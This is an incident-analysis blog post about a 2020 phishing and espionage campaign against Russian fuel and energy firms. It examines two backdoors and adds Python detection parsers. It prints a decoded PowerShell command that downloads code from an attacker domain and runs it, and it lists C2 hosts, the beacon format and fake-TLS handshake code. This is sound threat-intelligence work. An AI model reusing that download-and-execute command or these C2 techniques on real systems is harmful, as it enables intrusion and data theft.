Investigating a targeted espionage attack on the Russian fuel and energy complex


Our experience in investigating computer security incidents shows that e-mail is still one of the most common channels attackers use to gain initial access to a targeted infrastructure. A single careless action with a suspicious (or not so suspicious) message becomes the entry point for further infection, which is why cybercriminals make active use of social engineering, albeit with varying degrees of success.

In this post we want to talk about our recent investigation of a mailing campaign targeting several companies in the Russian fuel and energy complex. All of the attacks followed the same scenario built around fake e-mails, and nobody seems to have put much effort into the text of those e-mails.

Reconnaissance

It all started at the end of April 2020, when Doctor Web virus analysts discovered a mailing campaign in which the attackers sent an "updated telephone directory" to employees of several companies in the Russian fuel and energy complex. Of course, this was not a simple act of courtesy: the directory was not genuine, and the .docx documents downloaded two images from remote resources.

One of them was downloaded to the user's computer from the server news[.]zannews[.]com. Notably, the domain name resembles the domain of the Kazakh anti-corruption media centre, zannews[.]kz. Then again, the domain used was reminiscent of a 2015 campaign known as TOPNEWS, which used the ICEFOG backdoor and had Trojan control domains with "news" in their names. Another interesting feature was that when e-mails were sent to different recipients, the requests for downloading the image used either different request parameters or unique image names.

We believe this was done to collect information in order to identify a "reliable" employee who could be counted on to open the e-mail at the right moment. The SMB protocol was used to download the image from the second server, which could have been done to collect NetNTLM hashes from the computers of employees who opened the received document.

Here is the e-mail itself with the fake directory:

[Screenshot: the phishing e-mail with the fake telephone directory attached]

In June of this year the attackers started using a new domain name, sports[.]manhajnews[.]com, to host the images. The investigation showed that subdomains of manhajnews[.]com had been used in spam mailings since at least September 2019. One of the targets of that campaign was a major Russian university.

Also in June, the organizers of the attack came up with a new text for their e-mails: this time the document contained information about the development of the industry. The text of the e-mail made it clear that the author was either not a native Russian speaker or deliberately wanted to create that impression. Unfortunately, the ideas on industry development, as always, turned out to be nothing more than a cover: the document once again downloaded two images, while the server was changed to download[.]inklingpaper[.]com.

The next innovation followed in July. In an attempt to evade detection of the malicious documents by antivirus software, the attackers started using password-protected Microsoft Word documents. At the same time, they decided to use a classic social engineering technique: a notification about a bonus payment.


The text of the appeal was again written in the same style, which only raised further suspicion among the recipients. The server used to download the image did not change either.

Note that in all cases, mailboxes registered on mail[.]ru and yandex[.]ru were used to send the e-mails.

Attack

By early September 2020 the time for action had come. Our virus analysts recorded a new wave of attacks in which the attackers once again sent e-mails under the pretext of updating the telephone directory. This time, however, the attachment contained a malicious macro.

When the document was opened, the macro created two files:

  • a VBS script %APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs, intended to launch the batch file;
  • the batch file itself, %APPDATA%\configs\test.bat, which was obfuscated.


The main function of the batch file comes down to launching a PowerShell shell with certain parameters. The parameters passed to the shell decode into the following command:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

As can be seen from the command shown, the domain from which the payload is downloaded is once again disguised as a news site. What is downloaded is a simple loader whose only function is to receive shellcode from the command and control server and execute it. We were able to identify two types of backdoors that could be installed on the victim's PC.

BackDoor.Siggen2.3238

The first is BackDoor.Siggen2.3238: our specialists had never encountered it before, and there are no mentions of this program from other antivirus vendors either.

This program is a backdoor written in C++ that runs on 32-bit Windows operating systems.

BackDoor.Siggen2.3238 can communicate with the control server over two protocols: HTTP and HTTPS. The examined sample uses HTTPS. The following User-Agent is used in requests to the server:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

All requests are sent with the following set of parameters:

%s;type=%s;length=%s;realdata=%send

where each %s is replaced, respectively, with:

  • the ID of the infected computer,
  • the type of request being sent,
  • the length of the data in the realdata field,
  • the data itself.

At the stage of collecting information about the infected host, the backdoor builds a string of the form:

lan=%s;cmpname=%s;username=%s;version=%s;

where lan is the IP address of the infected computer, cmpname is the computer name, username is the user name, and version is the string 0.0.4.03.

This information is sent with the identifier sysinfo in a POST request to the control server at https[:]//31.214[.]157.14/log.txt. If BackDoor.Siggen2.3238 receives the HEART signal in response, the connection is considered successful and the backdoor starts its main communication loop with the server.

A full description of how BackDoor.Siggen2.3238 operates is available in our virus library.
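The beacon format described above lends itself to a simple detection: parse the POST body, check that the declared length really covers the realdata field, and match the fixed User-Agent and version string. The parser below is an added example, not code from the original post; the bot ID, host names and IP in the sample body are constructed.

```python
import re

# Indicators taken from the description above
SIGGEN2_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)"
SIGGEN2_VERSION = "0.0.4.03"


def parse_siggen2_beacon(body: str):
    """Parse a body of the form  <id>;type=<t>;length=<n>;realdata=<data>end.

    Returns a dict with id, type and the key=value fields of realdata,
    or None if the body does not follow the format exactly.
    """
    if not body.endswith("end"):
        return None
    # realdata itself may contain ';', so split on the literal ';realdata=' marker
    head, sep, data = body[:-3].partition(";realdata=")
    if not sep:
        return None
    m = re.fullmatch(r"([^;]+);type=([^;]+);length=(\d+)", head)
    if not m:
        return None
    bot_id, req_type, length = m.group(1), m.group(2), int(m.group(3))
    if length != len(data):          # declared length must cover realdata exactly
        return None
    fields = dict(kv.split("=", 1) for kv in data.split(";") if "=" in kv)
    return {"id": bot_id, "type": req_type, "fields": fields}


def looks_like_siggen2(user_agent: str, body: str) -> bool:
    """True when a request matches the sysinfo beacon of BackDoor.Siggen2.3238."""
    p = parse_siggen2_beacon(body)
    return (p is not None
            and user_agent == SIGGEN2_UA
            and p["type"] == "sysinfo"
            and p["fields"].get("version") == SIGGEN2_VERSION)


# Constructed sample of a sysinfo beacon (not a real capture)
SAMPLE_DATA = "lan=10.0.0.23;cmpname=WS-ACCT-07;username=ivanov;version=0.0.4.03;"
SAMPLE_BODY = f"A1B2C3D4;type=sysinfo;length={len(SAMPLE_DATA)};realdata={SAMPLE_DATA}end"
```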

BackDoor.Whitebird.23

The second program is a modification of the BackDoor.Whitebird backdoor, already known to us from the incident involving a government agency in Kazakhstan. This version is written in C++ and is designed to run on both 32-bit and 64-bit Windows operating systems.

Like most programs of this kind, BackDoor.Whitebird.23 is designed to establish an encrypted connection with the control server and to take unauthorized control of the infected computer. It is installed on the compromised system by the dropper BackDoor.Siggen2.3244.

The sample we examined is a malicious library with two exports:

  • Google Play
  • Test.

At the start of its operation it decrypts the configuration embedded in the backdoor's body using an algorithm based on XOR with the byte 0x99. The configuration structure looks like this:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

To keep itself running continuously, the backdoor changes the values stored in the working_hours field of the configuration. The field holds 1440 bytes, each taking the value 0 or 1 and representing one minute of each hour of the day. The backdoor creates a separate thread for every network interface; the thread listens on the interface and looks for proxy server authorization packets sent from the infected computer. When such a packet is detected, the backdoor adds the proxy server details to its list. In addition, it checks for a configured proxy through the WinAPI function InternetQueryOptionW.

The program checks the current hour and minute and compares them with the data in the working_hours field of the configuration. If the value for the corresponding minute of the day is non-zero, a connection to the control server is established.

Establishing a connection to the server imitates the setup of a TLS 1.0 connection between a client and a server. The body of the backdoor contains two buffers.

The first buffer contains a TLS 1.0 Client Hello packet.


The second buffer contains a TLS 1.0 Client Key Exchange packet with a key 0x100 bytes long, a Change Cipher Spec, and an Encrypted Handshake Message.


When sending the Client Hello packet, the backdoor writes 4 bytes of the current time and 28 bytes of "random" data into the Client Random field, computed as follows:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;
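Because the "random" bytes are derived from the timestamp and the configured C2 address, a defender with a packet capture can invert the construction: subtract the timestamp, undo the XOR, and check whether the seven overlapping DWORDs agree with each other, which a genuinely random Client Hello almost never does. The code below is an added example, not code from the original post; it assumes the 32-byte Random field is 4 bytes of big-endian time followed by the 28 derived bytes, and that the `&cnc_addr[i / 4]` cast on a wchar_t array really reads from byte offset i/2. The C2 name used in the sample is a placeholder.

```python
import struct


def whitebird_client_random(unix_time: int, cnc_addr: str) -> bytes:
    """Reference implementation of the decompiled Client Random construction."""
    cfg = cnc_addr.encode("utf-16-le").ljust(512, b"\x00")   # st_cfg.cnc_addr is wchar_t[256]
    t = struct.unpack(">I", struct.pack("<I", unix_time & 0xFFFFFFFF))[0]   # bswap32(time)
    rnd = bytearray(28)
    for i in range(0, 28, 4):
        chunk = struct.unpack_from("<I", cfg, i // 2)[0]     # overlapping 4-byte reads
        rnd[i:i + 4] = struct.pack("<I", (t + chunk) & 0xFFFFFFFF)
    for j in range(28):
        rnd[j] ^= (7 * j) & 0xFF
    return struct.pack("<I", t) + bytes(rnd)                # 4 time bytes + 28 derived bytes


def recover_cnc_prefix(client_random: bytes):
    """Invert the construction on a captured 32-byte Client Random.

    Returns (first 8 UTF-16 characters of cnc_addr, overlaps_consistent).
    The seven DWORDs overlap by two bytes each, so a real Whitebird handshake
    gives consistent overlaps while ordinary TLS randomness does not.
    """
    if len(client_random) != 32:
        raise ValueError("TLS Client Random is 32 bytes")
    t = struct.unpack("<I", client_random[:4])[0]   # the value the malware added
    rnd = bytearray(client_random[4:])
    for j in range(28):
        rnd[j] ^= (7 * j) & 0xFF
    cfg = bytearray(16)
    consistent = True
    for k in range(7):
        d = (struct.unpack_from("<I", rnd, 4 * k)[0] - t) & 0xFFFFFFFF
        chunk = struct.pack("<I", d)
        off = 2 * k
        if k > 0 and cfg[off:off + 2] != chunk[:2]:   # must agree with previous DWORD
            consistent = False
        cfg[off:off + 4] = chunk
    return cfg.decode("utf-16-le", errors="replace"), consistent


# Constructed sample: placeholder C2 name and timestamp, not indicators from the report
SAMPLE_RANDOM = whitebird_client_random(1599000000, "c2.example.invalid")
```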

The resulting packet is sent to the control server. In the response (the Server Hello packet) the following are checked:

  • the protocol version matches TLS 1.0;
  • the timestamp (the first 4 bytes of the packet's Random Data field) specified by the client matches the timestamp specified by the server;
  • the first 4 bytes after the timestamp in the client's and the server's Random Data fields match.

If all of these match, the backdoor prepares the Client Key Exchange packet. To do so it modifies the Public Key in the Client Key Exchange packet, as well as the Encryption IV and Encryption Data in the Encrypted Handshake Message packet.

The backdoor then receives a packet from the command and control server, checks that the protocol version is TLS 1.0, and receives a further 54 bytes (the packet body). This completes the connection setup.

A full description of how BackDoor.Whitebird.23 operates is available in our virus library.

Conclusions

Analysis of the documents, the malware and the tools used allows us to state with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of the backdoors installed on the victims' computers in the event of a successful attack, an infection leads, at the very least, to the theft of confidential information from the computers of the targeted organizations.

In addition, a likely scenario is the installation of specialized Trojans with special functionality on local servers. These may be domain controllers, mail servers, Internet gateways and so on. As we saw in the example of the incident in Kazakhstan, such servers are of particular interest to the attackers for a variety of reasons.

source: www.habr.com
